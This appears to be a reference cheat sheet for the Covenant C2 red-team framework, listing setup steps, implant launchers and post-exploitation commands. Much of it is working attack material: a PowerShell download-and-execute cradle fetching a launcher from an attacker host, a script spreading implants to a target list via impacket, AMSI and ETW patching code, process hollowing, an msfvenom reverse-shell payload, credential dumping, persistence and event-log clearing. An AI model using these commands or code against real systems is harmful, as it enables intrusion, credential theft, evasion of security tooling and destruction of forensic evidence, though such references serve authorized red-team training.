Covenant C2 Framework Cheat Sheet
Overview
Covenant is a .NET-based command and control (C2) framework designed for red team operations and penetration testing. It features a web-based interface for team collaboration, supports multiple communication protocols, and provides extensive post-exploitation capabilities specifically tailored for Windows environments using .NET assemblies.
⚠️ Warning: This tool is intended for authorized penetration testing and red team exercises only. Ensure you have proper authorization before using against any target.
Installation
Prerequisites
# Install .NET Core SDK (3.1 or later)
wget https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb -O packages-microsoft-prod.deb
sudo dpkg -i packages-microsoft-prod.deb
sudo apt update
sudo apt install -y dotnet-sdk-6.0
# Verify installation
dotnet --version
Docker Installation (Recommended)
# Clone Covenant repository
git clone --recurse-submodules https://github.com/cobbr/Covenant.git
cd Covenant/Covenant
# Build Docker image
docker build -t covenant .
# Run Covenant container
docker run -it -p 7443:7443 -p 80:80 -p 443:443 --name covenant covenant
# Access web interface
# Navigate to https://localhost:7443
Manual Installation
# Clone repository
git clone --recurse-submodules https://github.com/cobbr/Covenant.git
cd Covenant/Covenant
# Build Covenant
dotnet build
# Run Covenant
dotnet run
# Access web interface at https://localhost:7443
Kali Linux Installation
# Install from Kali repositories
sudo apt update
sudo apt install covenant
# Or build from source
git clone https://github.com/cobbr/Covenant.git
cd Covenant/Covenant
dotnet build
dotnet run
Basic Usage
Initial Setup
# First-time setup
1. Navigate to https://localhost:7443
2. Create admin user account
3. Accept SSL certificate warnings
4. Complete initial configuration wizard
# Default credentials (change immediately)
Username: CovenantAdmin
Password: CovenantPassword
Web Interface Navigation
| Section | Description |
|---|---|
| Dashboard | Overview of active grunts and listeners |
| Listeners | Manage communication listeners |
| Grunts | Manage compromised hosts (agents) |
| Tasks | Execute commands and modules |
| Templates | Manage grunt templates and launchers |
| Users | User management and permissions |
| Data | Collected data and file downloads |
Listeners Management
Creating HTTP Listener
# Web Interface Steps:
1. Navigate to Listeners → Create
2. Select HTTP Listener
3. Configure parameters:
- Name: HTTP-Listener-80
- Bind Address: 0.0.0.0
- Bind Port: 80
- Connect Address: [Your IP]
- Connect Port: 80
- Use SSL: False
# Advanced HTTP Configuration
- Profile: DefaultHttpProfile
- URLs: /en-us/index.html,/en-us/docs.html
- User Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Creating HTTPS Listener
# HTTPS Listener Configuration:
1. Navigate to Listeners → Create
2. Select HTTP Listener
3. Configure parameters:
- Name: HTTPS-Listener-443
- Bind Address: 0.0.0.0
- Bind Port: 443
- Connect Address: [Your IP]
- Connect Port: 443
- Use SSL: True
- SSL Certificate: [Upload or generate]
# Generate SSL Certificate
openssl req -new -x509 -keyout covenant.key -out covenant.crt -days 365 -nodes
Bridge Listener (SMB)
# SMB Bridge Configuration:
1. Navigate to Listeners → Create
2. Select Bridge Listener
3. Configure parameters:
- Name: SMB-Bridge
- Bind Address: 0.0.0.0
- Bind Port: 445
- Connect Address: [Target IP]
- Connect Port: 445
- Profile: SMBBridgeProfile
Grunt Generation and Deployment
PowerShell Grunt
# Generate PowerShell launcher
1. Navigate to Launchers → PowerShell
2. Configure parameters:
- Listener: HTTP-Listener-80
- Delay: 5
- Jitter: 0.1
- Connect Attempts: 5000
- Kill Date: [Future date]
# Generated PowerShell command example:
powershell -Sta -Nop -Window Hidden -EncodedCommand [Base64EncodedPayload]
# Execute on target
powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://[IP]/launcher.ps1')"
Binary Grunt
# Generate binary executable
1. Navigate to Launchers → Binary
2. Configure parameters:
- Listener: HTTPS-Listener-443
- Output Kind: ConsoleApplication
- Target Framework: net40
- Delay: 10
- Jitter: 0.2
# Download and execute on target
# Binary will be generated as .exe file
MSBuild Grunt
1. Navigate to Launchers → MSBuild
2. Configure listener and parameters
3. Generated MSBuild XML file:
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="MSBuild">
<MSBuildTask />
</Target>
<UsingTask TaskName="MSBuildTask" TaskFactory="CodeTaskFactory"
AssemblyFile="Microsoft.Build.Tasks.v4.0.dll">
<Task>
<Code Type="Class" Language="cs">
<![CDATA[
// Covenant grunt code here
]]>
</Code>
</Task>
</UsingTask>
</Project>
# Execute with:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe payload.xml
InstallUtil Grunt
# InstallUtil launcher
1. Navigate to Launchers → InstallUtil
2. Configure parameters
3. Execute on target:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U payload.exe
Grunt Management
Grunt Interaction
# Basic grunt commands
help # Show available commands
whoami # Get current user context
hostname # Get computer name
pwd # Get current directory
ls # List directory contents
cd [directory] # Change directory
cat [file] # Read file contents
download [file] # Download file from target
upload [local] [remote] # Upload file to target
Process Management
# Process operations
ps # List running processes
kill [PID] # Terminate process
getpid # Get current process ID
ppid # Get parent process ID
# Process injection
inject [PID] [assembly] # Inject .NET assembly into process
shinject [PID] [shellcode] # Inject shellcode into process
Credential Operations
# Credential harvesting
mimikatz # Execute Mimikatz
logonpasswords # Dump logon passwords
lsadump # Dump LSA secrets
dcsync [domain] [user] # DCSync attack
golden [options] # Golden ticket creation
# Token manipulation
steal_token [PID] # Steal process token
make_token [user] [pass] # Create new token
rev2self # Revert to original token
Lateral Movement
# WMI execution
wmi [computer] [command] # Execute command via WMI
wmiexec [computer] [user] [pass] [command] # WMI with credentials
# PowerShell remoting
winrm [computer] [command] # Execute via WinRM
invoke-command [computer] [scriptblock] # PowerShell remoting
# Service creation
sc [computer] [service] [binary] # Create and start service
Advanced Modules
Persistence Mechanisms
# Registry persistence
persist_registry [key] [value] [payload] # Registry autorun
# Scheduled task persistence
persist_schtask [name] [trigger] [payload] # Scheduled task
# Service persistence
persist_service [name] [payload] # Windows service
# WMI persistence
persist_wmi [filter] [consumer] [payload] # WMI event subscription
Privilege Escalation
# UAC bypass techniques
bypassuac [method] # Various UAC bypass methods
eventvwr # Event Viewer UAC bypass
fodhelper # FodHelper UAC bypass
computerdefaults # Computer Defaults UAC bypass
# Kernel exploits
ms16-032 # Secondary Logon Handle Privilege Escalation
ms16-135 # Windows Kernel-Mode Drivers EoP
Data Collection
# System information
sysinfo # Detailed system information
env # Environment variables
netstat # Network connections
arp # ARP table
route # Routing table
# File system operations
find [pattern] # Search for files
tree [directory] # Directory tree
drives # List available drives
Network Operations
# Port scanning
portscan [target] [ports] # TCP port scan
ping [target] # ICMP ping
nslookup [hostname] # DNS lookup
# Network shares
net share # List local shares
net use # List network connections
net view [computer] # List remote shares
Team Collaboration
User Management
# Web Interface User Operations:
1. Navigate to Users section
2. Create new user accounts
3. Assign roles and permissions:
- Administrator: Full access
- User: Limited access
- Listener: Listener management only
Data Sharing
# File management
1. Navigate to Data → Files
2. View downloaded files from all grunts
3. Share files between team members
4. Export data for analysis
# Credential sharing
1. Navigate to Data → Credentials
2. View harvested credentials
3. Export credential database
Reporting
# Generate reports
1. Navigate to Data → Events
2. Filter by time range and grunt
3. Export activity logs
4. Generate executive summary
Automation and Scripting
Grunt Automation Script
// C# automation script for Covenant
using System;
using System.Threading.Tasks;
using Covenant.Models;
public class AutomationScript
\\\\{
public async Task ExecuteAutomation(Grunt grunt)
\\\\{
// Automated reconnaissance
await grunt.ExecuteTask("whoami");
await grunt.ExecuteTask("hostname");
await grunt.ExecuteTask("sysinfo");
await grunt.ExecuteTask("ps");
// Credential harvesting
if (grunt.Integrity == "High")
\\\\{
await grunt.ExecuteTask("mimikatz");
await grunt.ExecuteTask("logonpasswords");
\\\\}
// Network discovery
await grunt.ExecuteTask("netstat");
await grunt.ExecuteTask("arp");
await grunt.ExecuteTask("net view");
// Persistence
await grunt.ExecuteTask("persist_registry HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Update payload.exe");
\\\\}
\\\\}
PowerShell Automation
# PowerShell script for automated grunt management
function Invoke-CovenantAutomation \\\\{
param(
[string]$CovenantURL = "https://localhost:7443",
[string]$Username,
[string]$Password
)
# Authenticate to Covenant API
$auth = @\\\\{
UserName = $Username
Password = $Password
\\\\}
$session = Invoke-RestMethod -Uri "$CovenantURL/api/users/login" -Method POST -Body ($auth|ConvertTo-Json) -ContentType "application/json"
# Get active grunts
$grunts = Invoke-RestMethod -Uri "$CovenantURL/api/grunts" -Headers @\\\\{Authorization = "Bearer $($session.token)"\\\\}
foreach ($grunt in $grunts) \\\\{
if ($grunt.Status -eq "Active") \\\\{
Write-Host "Processing grunt: $($grunt.Name)"
# Execute reconnaissance commands
$commands = @("whoami", "hostname", "sysinfo", "ps")
foreach ($cmd in $commands) \\\\{
$task = @\\\\{
Type = "GruntTask"
GruntId = $grunt.Id
Command = $cmd
\\\\}
Invoke-RestMethod -Uri "$CovenantURL/api/grunttasks" -Method POST -Body ($task|ConvertTo-Json) -ContentType "application/json" -Headers @\\\\{Authorization = "Bearer $($session.token)"\\\\}
Start-Sleep -Seconds 2
\\\\}
\\\\}
\\\\}
\\\\}
# Usage
Invoke-CovenantAutomation -Username "admin" -Password "password"
Batch Grunt Deployment
#!/bin/bash
# Batch grunt deployment script
COVENANT_URL="https://your-covenant-server:7443"
TARGETS_FILE="targets.txt"
# Generate PowerShell launcher
LAUNCHER=$(curl -s -k -X GET "$COVENANT_URL/api/launchers/powershell/1" -H "Authorization: Bearer $TOKEN"|jq -r '.LauncherString')
# Deploy to multiple targets
while read -r target; do
echo "[+] Deploying to $target"
# Method 1: WMI execution
impacket-wmiexec "$DOMAIN/$USERNAME:$PASSWORD@$target" "powershell -exec bypass -c \"$LAUNCHER\""
# Method 2: PSExec
impacket-psexec "$DOMAIN/$USERNAME:$PASSWORD@$target" "powershell -exec bypass -c \"$LAUNCHER\""
# Method 3: SMB + scheduled task
impacket-smbexec "$DOMAIN/$USERNAME:$PASSWORD@$target" "schtasks /create /tn Update /tr \"powershell -exec bypass -c \\\"$LAUNCHER\\\"\" /sc once /st 00:00"
sleep 5
done < "$TARGETS_FILE"
Evasion Techniques
AMSI Bypass
// AMSI bypass in Covenant grunt
[System.Diagnostics.CodeAnalysis.SuppressMessage("Microsoft.Usage", "CA2201:DoNotRaiseReservedExceptionTypes")]
public static void BypassAMSI()
\\\\{
try
\\\\{
var amsiContext = Marshal.AllocHGlobal(9076);
var amsiSession = Marshal.AllocHGlobal(9076);
var amsiScanBuffer = Marshal.AllocHGlobal(9076);
// AMSI bypass implementation
var amsiDll = LoadLibrary("amsi.dll");
var amsiScanBufferAddr = GetProcAddress(amsiDll, "AmsiScanBuffer");
var patch = new byte[] \\\\{ 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 \\\\};
var oldProtect = VirtualProtect(amsiScanBufferAddr, (UIntPtr)patch.Length, 0x40, out uint _);
Marshal.Copy(patch, 0, amsiScanBufferAddr, patch.Length);
VirtualProtect(amsiScanBufferAddr, (UIntPtr)patch.Length, oldProtect, out uint _);
\\\\}
catch \\\\{ \\\\}
\\\\}
ETW Bypass
// ETW bypass implementation
public static void BypassETW()
\\\\{
try
\\\\{
var ntdll = LoadLibrary("ntdll.dll");
var etwEventWrite = GetProcAddress(ntdll, "EtwEventWrite");
var patch = new byte[] \\\\{ 0xC3 \\\\}; // ret instruction
var oldProtect = VirtualProtect(etwEventWrite, (UIntPtr)patch.Length, 0x40, out uint _);
Marshal.Copy(patch, 0, etwEventWrite, patch.Length);
VirtualProtect(etwEventWrite, (UIntPtr)patch.Length, oldProtect, out uint _);
\\\\}
catch \\\\{ \\\\}
\\\\}
Process Hollowing
// Process hollowing implementation
public static void ProcessHollow(string targetProcess, byte[] payload)
\\\\{
var startupInfo = new STARTUPINFO();
var processInfo = new PROCESS_INFORMATION();
// Create suspended process
CreateProcess(null, targetProcess, IntPtr.Zero, IntPtr.Zero, false,
ProcessCreationFlags.CREATE_SUSPENDED, IntPtr.Zero, null,
ref startupInfo, out processInfo);
// Unmap original image
ZwUnmapViewOfSection(processInfo.hProcess, GetImageBase(processInfo.hProcess));
// Allocate memory and write payload
var baseAddress = VirtualAllocEx(processInfo.hProcess, GetImageBase(processInfo.hProcess),
payload.Length, AllocationType.Commit|AllocationType.Reserve,
MemoryProtection.ExecuteReadWrite);
WriteProcessMemory(processInfo.hProcess, baseAddress, payload, payload.Length, out _);
// Resume execution
ResumeThread(processInfo.hThread);
\\\\}
Integration with Other Tools
Metasploit Integration
# Use Covenant with Metasploit
# Generate Metasploit payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=443 -f exe -o meterpreter.exe
# Upload via Covenant grunt
upload meterpreter.exe C:\Windows\Temp\update.exe
# Execute Metasploit payload
execute C:\Windows\Temp\update.exe
# Use Metasploit for post-exploitation
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 192.168.1.100
set LPORT 443
run
BloodHound Integration
# Collect BloodHound data via Covenant
# Upload SharpHound to target
upload SharpHound.exe C:\Windows\Temp\collector.exe
# Run BloodHound collection
execute C:\Windows\Temp\collector.exe -c All -d domain.local
# Download collected data
download C:\Windows\Temp\*BloodHound.zip
# Import into BloodHound
neo4j start
./BloodHound --no-sandbox
# Import downloaded zip file
CrackMapExec Integration
# Use CME for initial access, Covenant for persistence
# Initial compromise via CME
crackmapexec smb 192.168.1.0/24 -u username -p password --exec-method wmiexec -x "powershell -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/launcher.ps1')\""
# Verify Covenant grunt connection
# Use Covenant for further exploitation
Operational Security
Communication Security
# Use domain fronting
1. Configure CloudFlare or similar CDN
2. Set up domain fronting rules
3. Configure Covenant listener with fronted domain
4. Use legitimate-looking URLs and user agents
# Certificate management
# Use legitimate SSL certificates
certbot certonly --standalone -d your-domain.com
# Configure Covenant with legitimate certificate
Traffic Obfuscation
# Custom HTTP profiles
1. Navigate to Profiles → HTTP
2. Create custom profile mimicking legitimate traffic:
- User agents from target environment
- URLs matching legitimate applications
- Headers matching expected traffic
# Malleable C2 profiles
# Create custom communication patterns
# Mimic legitimate applications (Office 365, Google, etc.)
Anti-Forensics
# Event log clearing
wevtutil cl System
wevtutil cl Security
wevtutil cl Application
# Timestomping
timestomp C:\Windows\Temp\payload.exe -f C:\Windows\System32\notepad.exe
# Memory cleanup
# Implement memory wiping in custom tasks
# Use process migration to avoid memory analysis
Troubleshooting
Common Issues
# Grunt not connecting
1. Check firewall rules on Covenant server
2. Verify listener configuration
3. Test network connectivity
4. Check antivirus interference
# SSL certificate issues
# Generate new certificate
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes
# Performance issues
# Increase grunt delay and jitter
# Use multiple listeners for load balancing
# Optimize task execution frequency
Debug Mode
# Enable debug logging
1. Navigate to Administration → Settings
2. Enable debug logging
3. Check logs in Data → Events
4. Monitor grunt communication
# Network troubleshooting
# Use Wireshark to analyze traffic
# Check for network filtering
# Verify DNS resolution
Database Issues
# Reset Covenant database
cd Covenant/Covenant
rm -rf Data/covenant.db
dotnet run
# Backup database
cp Data/covenant.db Data/covenant.db.backup
# Restore database
cp Data/covenant.db.backup Data/covenant.db
Best Practices
Operational Planning
- Pre-engagement setup: Configure listeners and profiles before engagement
- Team coordination: Use role-based access control for team members
- Communication protocols: Establish clear communication channels
- Data handling: Implement secure data collection and storage procedures
- Cleanup procedures: Plan for artifact removal and cleanup
Security Considerations
# Secure Covenant deployment
# Use strong authentication
# Enable HTTPS with valid certificates
# Implement network segmentation
# Regular security updates
# Grunt management
# Use unique grunt names
# Implement kill dates
# Regular grunt rotation
# Secure communication channels
Documentation
# Maintain operation logs
# Document all activities
# Track compromised systems
# Record credential harvesting
# Generate executive reports
Resources
- Covenant GitHub Repository
- Covenant Documentation
- SpecterOps Blog Posts
- Red Team Village Covenant Training
- SANS Red Team Operations
This cheat sheet provides a comprehensive reference for using Covenant C2 framework. Always ensure you have proper authorization before conducting red team operations or penetration testing.